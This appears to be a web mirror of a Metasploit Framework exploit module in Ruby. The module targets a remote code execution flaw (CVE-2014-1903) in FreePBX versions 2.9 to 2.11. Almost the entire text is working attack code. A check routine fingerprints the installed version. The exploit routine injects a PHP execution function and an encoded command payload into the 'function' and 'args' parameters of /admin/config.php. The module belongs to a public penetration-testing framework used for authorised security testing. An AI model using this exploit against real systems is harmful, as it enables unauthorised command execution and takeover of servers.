Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/unix/webapp/freepbx_config_exec.rb
19534 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => "FreePBX config.php Remote Code Execution",

16
        'Description' => %q{

17
          This module exploits a vulnerability found in FreePBX version 2.9, 2.10, and 2.11.

18
          It's possible to inject arbitrary PHP functions and commands in the "/admin/config.php"

19
          parameters "function" and "args".

20
        },

21
        'License' => MSF_LICENSE,

22
        'Author' => [

23
          'i-Hmx', # Vulnerability discovery

24
          '0x00string', # PoC

25
          'xistence <xistence[at]0x90.nl>' # Metasploit module

26
        ],

27
        'References' => [

28
          ['CVE', '2014-1903'],

29
          ['OSVDB', '103240'],

30
          ['EDB', '32214'],

31
          ['URL', 'http://issues.freepbx.org/browse/FREEPBX-7123']

32
        ],

33
        'Platform' => 'unix',

34
        'Arch' => ARCH_CMD,

35
        'Targets' => [

36
          ['FreePBX', {}]

37
        ],

38
        'Privileged' => false,

39
        'DisclosureDate' => '2014-03-21',

40
        'DefaultTarget' => 0,

41
        'Notes' => {

42
          'Reliability' => UNKNOWN_RELIABILITY,

43
          'Stability' => UNKNOWN_STABILITY,

44
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

45
        }

46
      )

47
    )

48


49
    register_options(

50
      [

51
        OptString.new('TARGETURI', [true, 'The base path to the FreePBX installation', '/'])

52
      ]

53
    )

54


55
    register_advanced_options(

56
      [

57
        OptString.new('PHPFUNC', [true, 'The PHP execution function to use', 'passthru'])

58
      ]

59
    )

60
  end

61


62
  def check

63
    vprint_status("Trying to detect installed version")

64


65
    res = send_request_cgi({

66
      'method' => 'GET',

67
      'uri' => normalize_uri(target_uri.path, "admin", "CHANGES")

68
    })

69


70
    if res and res.code == 200 and res.body =~ /^(.*)$/

71
      version = $1

72
    else

73
      return Exploit::CheckCode::Unknown

74
    end

75


76
    vprint_status("Version #{version} detected")

77


78
    if version =~ /2\.(9|10|11)\.0/

79
      return Exploit::CheckCode::Appears

80
    else

81
      return Exploit::CheckCode::Safe

82
    end

83
  end

84


85
  def exploit

86
    rand_data = rand_text_alpha_lower(rand(10) + 5)

87


88
    print_status("Sending payload")

89
    res = send_request_cgi({

90
      'method' => 'GET',

91
      'uri' => normalize_uri(target_uri.path, "admin", "config.php"),

92
      'vars_get' => {

93
        "display" => rand_data,

94
        "handler" => "api",

95
        "function" => datastore['PHPFUNC'],

96
        "args" => payload.encoded

97
      }

98
    })

99


100
    # If we don't get a 200 when we request our malicious payload, we suspect

101
    # we don't have a shell, either.

102
    if res and res.code != 200

103
      print_error("Unexpected response, exploit probably failed!")

104
    end

105
  end

106
end

107


108